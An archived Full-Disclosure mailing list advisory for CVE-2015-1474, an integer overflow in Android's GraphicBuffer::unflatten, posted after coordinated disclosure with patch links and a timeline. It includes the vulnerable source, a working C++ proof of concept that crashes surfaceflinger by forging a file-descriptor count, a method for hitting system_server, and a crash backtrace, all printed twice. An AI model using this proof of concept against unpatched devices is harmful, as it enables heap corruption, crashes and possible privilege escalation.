| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAC-hzSrNu=298ymRHnv4c03gR0NR7yq=Jn1Ju6V4He4GtqCt5g@mail.gmail.com>
Date: Thu, 12 Mar 2015 10:23:54 +0800
From: Guang Gong <higongguang@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] [CVE-2015-1474]Integer overflow leading to heap corruption
while unflattening GraphicBuffer
Correct the format
#############################################################################
#
# QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID: CVE-2015-1474
# Product: Android
# Vendor: Google
# Subject: Integer overflow leading to heap corruption while unflattening
GraphicBuffer
# Effect: Gain privileges or cause a denial of service
# Author: Guang Gong
# Date: March 11th 2015
#
#############################################################################
Introduction
------------
Multiple integer overflows in the GraphicBuffer::unflatten function in
platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0
allow attackers to gain privileges or cause a denial of service (memory
corruption) via vectors that trigger a large number of (1) file descriptors
or (2) integer values.
Affected Android version
----------
all versions below Lollipop 5.1
Patches
-------
Android Bug id 18076253
There are two patches for this vulnerabilities, the first patch for this
issue is uncomplete.
[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
Description
-----------
The vulnerable code is as follows.
28native_handle_t* native_handle_create(int numFds, int numInts)
29{
30 native_handle_t* h = malloc(
31 sizeof(native_handle_t) +
sizeof(int)*(numFds+numInts));---------------> integer overflow here,
numFds and numInts can be controlled by normal Apps.
32
33 h->version = sizeof(native_handle_t);
34 h->numFds = numFds;
35 h->numInts = numInts;
36 return h;
37}
244status_t GraphicBuffer::unflatten(
245 void const*& buffer, size_t& size, int const*& fds, size_t&
count) {
…
271 native_handle* h = native_handle_create(numFds, numInts);
272 memcpy(h->data, fds, numFds*sizeof(int));
---------------->heap corruption hear.
273 memcpy(h->data + numFds, &buf[8], numInts*sizeof(int));
….
Attack vector
-------------
A normal Apps can corrupt the heap in surfaceflinger and system_server by
this vulnerabilities.
the PoC of corrupting the heap of surfaceflinger is as follows
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <utils/Log.h>
#include <binder/IPCThreadState.h>
#include <binder/ProcessState.h>
#include <binder/IServiceManager.h>
#include <gui/ISurfaceComposer.h>
#include <gui/BufferQueue.h>
#include <gui/CpuConsumer.h>
#include <unistd.h>
using namespace android;
class MyBufferQueue:public BufferQueue{
public:
status_t onTransact(uint32_t code, const Parcel& data, Parcel*
reply, uint32_t flags){
status_t ret =
BnGraphicBufferProducer::onTransact(code,data,reply,flags);
if(code==1){
int *data = (int *)reply->data();
int *numFDs = data+9;
*numFDs=0xfffffffd;
}
return ret;
}
};
int main()
{
sp<ProcessState> proc(ProcessState::self());
proc->startThreadPool();
const String16 name("SurfaceFlinger");
sp<ISurfaceComposer> composer;
getService(name, &composer);
uint32_t w, h;
PixelFormat f;
sp<IBinder>
display(composer->getBuiltInDisplay(ISurfaceComposer::eDisplayIdMain));
sp<MyBufferQueue> bufferQueue = new MyBufferQueue();
sp<CpuConsumer> cpuConsumer = new CpuConsumer(bufferQueue, 1);
status_t err = composer->captureScreen(display, bufferQueue,
0,0,0,-1UL);
if (err != NO_ERROR) {
fprintf(stderr, "screen capture failed: %s\n", strerror(-err));
exit(0);
}
printf("screen capture success\n");
IPCThreadState::self()->joinThreadPool();
return 0;
}
How to corrupt the heap of system_server
put a malformated GraphicBuffer in a Bundle, and then send it to
system_server via setApplicationRestrictions. it’s the same way as
CVE-2014-7911.
The backtrace of crash surfaceflinger
55 --------- beginning of crash
56 F/libc (15504): Fatal signal 11 (SIGSEGV), code 1, fault addr
0xb1000000 in tid 15504 (surfaceflinger)
57 I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** ***
*** *** ***
58 I/DEBUG ( 180): Build fingerprint:
'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
59 I/DEBUG ( 180): Revision: '11'
60 I/DEBUG ( 180): ABI: 'arm'
61 I/DEBUG ( 180): pid: 15504, tid: 15504, name: surfaceflinger >>>
/system/bin/surfaceflinger <<<
62 I/DEBUG ( 180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault
addr 0xb1000000
63 W/NativeCrashListener(15836): Couldn't find ProcessRecord for pid 15504
64 I/DEBUG ( 180): r0 b1000000 r1 b6be41ec r2 ff81eff0 r3
00000004
65 E/DEBUG ( 180): AM write failure (32 / Broken pipe)
66 I/DEBUG ( 180): r4 b647ac00 r5 fffffffd r6 b6302150 r7
00000050
67 I/DEBUG ( 180): r8 bef65734 r9 bef65738 sl bef6573c fp
b081f070
68 I/DEBUG ( 180): ip 80000000 sp bef656f0 lr b6c6cfb7 pc
b6eb2e30 cpsr a00f0030
69 I/DEBUG ( 180):
70 I/DEBUG ( 180): backtrace:
71 I/DEBUG ( 180): #00 pc 0000fe30 /system/lib/libc.so
(__memcpy_base+91) ------------------------->memcpy cause heap corruption
72 I/DEBUG ( 180): #01 pc 00005fb3 /system/lib/libui.so
(android::GraphicBuffer::unflatten(void const*&, unsigned int&, int
const*&, unsigned int&)+98)
73 I/DEBUG ( 180): #02 pc 00025e09 /system/lib/libgui.so
74 I/DEBUG ( 180): #03 pc 0001e985 /system/lib/libbinder.so
(android::Parcel::read(android::Parcel::FlattenableHelperInterface&)
const+176)
75 I/DEBUG ( 180): #04 pc 0002638d /system/lib/libgui.so
76 I/DEBUG ( 180): #05 pc 0002adc3 /system/lib/libgui.so
(android::Surface::dequeueBuffer(ANativeWindowBuffer**, int*)+226)
77 I/DEBUG ( 180): #06 pc 0002aa81 /system/lib/libgui.so
(android::Surface::hook_dequeueBuffer_DEPRECATED(ANativeWindow*,
ANativeWindowBuffer**)+32)
78 I/DEBUG ( 180): #07 pc 000175cf
/system/lib/libsurfaceflinger.so
79 I/DEBUG ( 180): #08 pc 0001b80f
/system/lib/libsurfaceflinger.so
80 I/DEBUG ( 180): #09 pc 000158f5
/system/lib/libsurfaceflinger.so
81 I/DEBUG ( 180): #10 pc 00010907 /system/lib/libutils.so
(android::Looper::pollInner(int)+410)
82 I/DEBUG ( 180): #11 pc 000109f9 /system/lib/libutils.so
(android::Looper::pollOnce(int, int*, int*, void**)+92)
83 I/DEBUG ( 180): #12 pc 00015ad1
/system/lib/libsurfaceflinger.so
84 I/DEBUG ( 180): #13 pc 0001675d
/system/lib/libsurfaceflinger.so (android::SurfaceFlinger::run()+8)
85 I/DEBUG ( 180): #14 pc 0000083d /system/bin/surfaceflinger
86 I/DEBUG ( 180): #15 pc 0000f811 /system/lib/libc.so
(__libc_init+44)
87 I/DEBUG ( 180): #16 pc 000008d8 /system/bin/surfaceflinger
88 I/DEBUG ( 180):
89 I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_01
90 I/BootReceiver(15836): Copying /data/tombstones/tombstone_01 to
DropBox (SYSTEM_TOMBSTONE)
91 I/ServiceManager( 176): service 'SurfaceFlinger' died
92 I/ServiceManager( 176): service 'display.qservice' died
Milestones
----------
Date Comment Sender
20/10/2014 Initial Report of CVE-2015-1474 Qihoo 360
22/10/2014 Forwarded to the dedicated Team by Google Google
04/11/2014 Classified it as a high severity vulnerability Google
06/11/2014 Get the Android Bug ID 18076253 Google
10/2/2015 Notify it’s fixed and send the CVE-ID Google
16/2/2015 Tell Google the first patch was uncomplete Qihoo 360
18/2/2015 Submitted the second patch Google
11/3/2015 Lollipop 5.1 was released, disclose it Qihoo 360
References
----------
[1]
https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
[2]
https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
[3]https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1474
[4]
http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28
On Wed, Mar 11, 2015 at 6:17 PM, Guang Gong <higongguang@...il.com> wrote:
>
> #############################################################################
> #
> # QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
> #
>
> #############################################################################
> #
> # CVE ID: CVE-2015-1474
> # Product: Android
> # Vendor: Google
> # Subject: Integer overflow leading to heap corruption while
> unflattening GraphicBuffer
> # Effect: Gain privileges or cause a denial of service
> # Author: Guang Gong
>
> # Date: March 11th 2015
> #
>
> #############################################################################
>
>
> Introduction
> ------------
> Multiple integer overflows in the GraphicBuffer::unflatten function in
> platform/frameworks/native/libs/ui/GraphicBuffer.cpp in Android through 5.0
> allow attackers to gain privileges or cause a denial of service (memory
> corruption) via vectors that trigger a large number of (1) file descriptors
> or (2) integer values.
>
> Affected Android version
> ----------
>
> all versions below Lollipop 5.1
>
> Patches
> -------
>
> Android Bug id 18076253
> There are two patches for this vulnerabilities, the first patch for this
> issue is uncomplete.
>
> [1]
> https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
>
> [2]
> https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
>
> Description
> -----------
> The vulnerable code is as follows.
>
> 28
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28>
> native_handle_t
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>*
> native_handle_create
> <http://androidxref.com/4.4.4_r1/s?refs=native_handle_create&project=system>
> (int numFds <http://androidxref.com/4.4.4_r1/s?refs=numFds&project=system>,
> int numInts
> <http://androidxref.com/4.4.4_r1/s?refs=numInts&project=system>)
>
> 29
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#29>
> {
>
> 30
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#30>
> native_handle_t
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>*
> h = malloc <http://androidxref.com/4.4.4_r1/s?defs=malloc&project=system>(
>
> 31
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#31>
> sizeof(native_handle_t
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>)
> + sizeof(int)*(numFds
> <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>+numInts
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
> ));---------------> integer overflow here, numFds and numInts can be
> controlled by normal Apps.
>
> 32
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#32>
>
> 33
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#33>
> h->version
> <http://androidxref.com/4.4.4_r1/s?defs=version&project=system> = sizeof(
> native_handle_t
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle_t&project=system>);
>
> 34
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#34>
> h->numFds
> <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system> = numFds
> <http://androidxref.com/4.4.4_r1/s?defs=numFds&project=system>;
>
> 35
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#35>
> h->numInts
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
> = numInts
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#numInts>
> ;
>
> 36
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#36>
> return h;
>
> 37
> <http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#37>
> }
>
>
>
> 244
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#244>
> status_t
> <http://androidxref.com/4.4.4_r1/s?defs=status_t&project=frameworks>
> GraphicBuffer
> <http://androidxref.com/4.4.4_r1/s?defs=GraphicBuffer&project=frameworks>
> ::unflatten
> <http://androidxref.com/4.4.4_r1/s?refs=unflatten&project=frameworks>(
>
> 245
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#245>
> void const*& buffer
> <http://androidxref.com/4.4.4_r1/s?defs=buffer&project=frameworks>, size_t
> <http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>& size
> <http://androidxref.com/4.4.4_r1/s?defs=size&project=frameworks>, int
> const*& fds
> <http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>, size_t
> <http://androidxref.com/4.4.4_r1/s?defs=size_t&project=frameworks>& count
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#count>)
> {
>
> …
>
> 271
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#271>
> native_handle
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle&project=frameworks>*
> h = native_handle_create
> <http://androidxref.com/4.4.4_r1/s?defs=native_handle_create&project=frameworks>
> (numFds
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
> , numInts
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
> );
>
> 272
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#272>
> memcpy
> <http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
> <http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks>,
> fds <http://androidxref.com/4.4.4_r1/s?defs=fds&project=frameworks>,
> numFds
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>
> *sizeof(int)); ---------------->heap corruption hear.
>
> 273
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#273>
> memcpy
> <http://androidxref.com/4.4.4_r1/s?defs=memcpy&project=frameworks>(h->data
> <http://androidxref.com/4.4.4_r1/s?defs=data&project=frameworks> + numFds
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numFds>,
> &buf <http://androidxref.com/4.4.4_r1/s?defs=buf&project=frameworks>[8],
> numInts
> <http://androidxref.com/4.4.4_r1/xref/frameworks/native/libs/ui/GraphicBuffer.cpp#numInts>
> *sizeof(int));
>
> ….
>
>
> Attack vector
> -------------
> A normal Apps can corrupt the heap in surfaceflinger and system_server by
> this vulnerabilities.
>
> the PoC of corrupting the heap of surfaceflinger is as follows
>
> #include <sys/types.h>
>
> #include <sys/stat.h>
>
> #include <fcntl.h>
>
> #include <utils/Log.h>
>
> #include <binder/IPCThreadState.h>
>
> #include <binder/ProcessState.h>
>
> #include <binder/IServiceManager.h>
>
> #include <gui/ISurfaceComposer.h>
>
> #include <gui/BufferQueue.h>
>
> #include <gui/CpuConsumer.h>
>
> #include <unistd.h>
>
>
> using namespace android;
>
> class MyBufferQueue:public BufferQueue{
>
> public:
>
> status_t onTransact(uint32_t code, const Parcel& data, Parcel*
> reply, uint32_t flags){
>
> status_t ret =
> BnGraphicBufferProducer::onTransact(code,data,reply,flags);
>
> if(code==1){
>
> int *data = (int *)reply->data();
>
> int *numFDs = data+9;
>
> *numFDs=0xfffffffd;
>
> }
>
> return ret;
>
> }
>
> };
>
> int main()
>
> {
>
> sp<ProcessState> proc(ProcessState::self());
>
> proc->startThreadPool();
>
> const String16 name("SurfaceFlinger");
>
> sp<ISurfaceComposer> composer;
>
> getService(name, &composer);
>
> uint32_t w, h;
>
> PixelFormat f;
>
> sp<IBinder>
> display(composer->getBuiltInDisplay(ISurfaceComposer::eDisplayIdMain));
>
> sp<MyBufferQueue> bufferQueue = new MyBufferQueue();
>
> sp<CpuConsumer> cpuConsumer = new CpuConsumer(bufferQueue, 1);
>
> status_t err = composer->captureScreen(display, bufferQueue,
> 0,0,0,-1UL);
>
> if (err != NO_ERROR) {
>
> fprintf(stderr, "screen capture failed: %s\n", strerror(-err));
>
> exit(0);
>
> }
>
> printf("screen capture success\n");
>
> IPCThreadState::self()->joinThreadPool();
>
> return 0;
>
> }
>
> How to corrupt the heap of system_server
>
> put a malformated GraphicBuffer in a Bundle, and then send it to
> system_server via setApplicationRestrictions. it’s the same way as
> CVE-2014-7911.
>
> The backtrace of crash surfaceflinger
>
> 55 --------- beginning of crash
>
> 56 F/libc (15504): Fatal signal 11 (SIGSEGV), code 1, fault addr
> 0xb1000000 in tid 15504 (surfaceflinger)
>
> 57 I/DEBUG ( 180): *** *** *** *** *** *** *** *** *** *** *** *** ***
> *** *** ***
>
> 58 I/DEBUG ( 180): Build fingerprint:
> 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
>
> 59 I/DEBUG ( 180): Revision: '11'
>
> 60 I/DEBUG ( 180): ABI: 'arm'
>
> 61 I/DEBUG ( 180): pid: 15504, tid: 15504, name: surfaceflinger >>>
> /system/bin/surfaceflinger <<<
>
> 62 I/DEBUG ( 180): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault
> addr 0xb1000000
>
> 63 W/NativeCrashListener(15836): Couldn't find ProcessRecord for pid 15504
>
> 64 I/DEBUG ( 180): r0 b1000000 r1 b6be41ec r2 ff81eff0 r3
> 00000004
>
> 65 E/DEBUG ( 180): AM write failure (32 / Broken pipe)
>
> 66 I/DEBUG ( 180): r4 b647ac00 r5 fffffffd r6 b6302150 r7
> 00000050
>
> 67 I/DEBUG ( 180): r8 bef65734 r9 bef65738 sl bef6573c fp
> b081f070
>
> 68 I/DEBUG ( 180): ip 80000000 sp bef656f0 lr b6c6cfb7 pc
> b6eb2e30 cpsr a00f0030
>
> 69 I/DEBUG ( 180):
>
> 70 I/DEBUG ( 180): backtrace:
>
> 71 I/DEBUG ( 180): #00 pc 0000fe30 /system/lib/libc.so
> (__memcpy_base+91) ------------------------->memcpy cause heap corruption
>
> 72 I/DEBUG ( 180): #01 pc 00005fb3 /system/lib/libui.so
> (android::GraphicBuffer::unflatten(void const*&, unsigned int&, int
> const*&, unsigned int&)+98)
>
> 73 I/DEBUG ( 180): #02 pc 00025e09 /system/lib/libgui.so
>
> 74 I/DEBUG ( 180): #03 pc 0001e985 /system/lib/libbinder.so
> (android::Parcel::read(android::Parcel::FlattenableHelperInterface&)
> const+176)
>
> 75 I/DEBUG ( 180): #04 pc 0002638d /system/lib/libgui.so
>
> 76 I/DEBUG ( 180): #05 pc 0002adc3 /system/lib/libgui.so
> (android::Surface::dequeueBuffer(ANativeWindowBuffer**, int*)+226)
>
> 77 I/DEBUG ( 180): #06 pc 0002aa81 /system/lib/libgui.so
> (android::Surface::hook_dequeueBuffer_DEPRECATED(ANativeWindow*,
> ANativeWindowBuffer**)+32)
>
> 78 I/DEBUG ( 180): #07 pc 000175cf
> /system/lib/libsurfaceflinger.so
>
> 79 I/DEBUG ( 180): #08 pc 0001b80f
> /system/lib/libsurfaceflinger.so
>
> 80 I/DEBUG ( 180): #09 pc 000158f5
> /system/lib/libsurfaceflinger.so
>
> 81 I/DEBUG ( 180): #10 pc 00010907 /system/lib/libutils.so
> (android::Looper::pollInner(int)+410)
>
> 82 I/DEBUG ( 180): #11 pc 000109f9 /system/lib/libutils.so
> (android::Looper::pollOnce(int, int*, int*, void**)+92)
>
> 83 I/DEBUG ( 180): #12 pc 00015ad1
> /system/lib/libsurfaceflinger.so
>
> 84 I/DEBUG ( 180): #13 pc 0001675d
> /system/lib/libsurfaceflinger.so (android::SurfaceFlinger::run()+8)
>
> 85 I/DEBUG ( 180): #14 pc 0000083d /system/bin/surfaceflinger
>
> 86 I/DEBUG ( 180): #15 pc 0000f811 /system/lib/libc.so
> (__libc_init+44)
>
> 87 I/DEBUG ( 180): #16 pc 000008d8 /system/bin/surfaceflinger
>
> 88 I/DEBUG ( 180):
>
> 89 I/DEBUG ( 180): Tombstone written to: /data/tombstones/tombstone_01
>
> 90 I/BootReceiver(15836): Copying /data/tombstones/tombstone_01 to
> DropBox (SYSTEM_TOMBSTONE)
>
> 91 I/ServiceManager( 176): service 'SurfaceFlinger' died
>
> 92 I/ServiceManager( 176): service 'display.qservice' died
>
>
>
> Milestones
> ----------
>
> Date
>
> Comment
>
> Sender
>
> 20/10/2014
>
> Initial Report of CVE-2015-1474
>
> Qihoo 360
>
> 22/10/2014
>
> Forwarded to the dedicated Team by Google
>
> Google
>
> 04/11/2014
>
> Classified it as a high severity vulnerability
>
> Google
>
> 06/11/2014
>
> Get the Android Bug ID 18076253
>
> Google
>
> 10/2/2015
>
> Notify it’s fixed and send the CVE-ID
>
> Google
>
> 16/2/2015
>
> Tell Google the first patch was uncomplete
>
> Qihoo 360
>
> 18/2/2015
>
> Submitted the second patch
>
> Google
>
> 11/3/2015
>
> Lollipop 5.1 was released, disclose it
>
> Qihoo 360
>
>
>
> References
> ----------
> [1]
> https://android.googlesource.com/platform/frameworks/native/+/e6f7a44e835d320593fa33052f35ea52948ff0b2
>
> [2]
> https://android.googlesource.com/platform/frameworks/native/+/796aaf7fb160fea12bddc8406d7f006ce811eb43
>
> [3]https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1474
>
> [4]
> http://androidxref.com/4.4.4_r1/xref/system/core/libcutils/native_handle.c#28
>
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists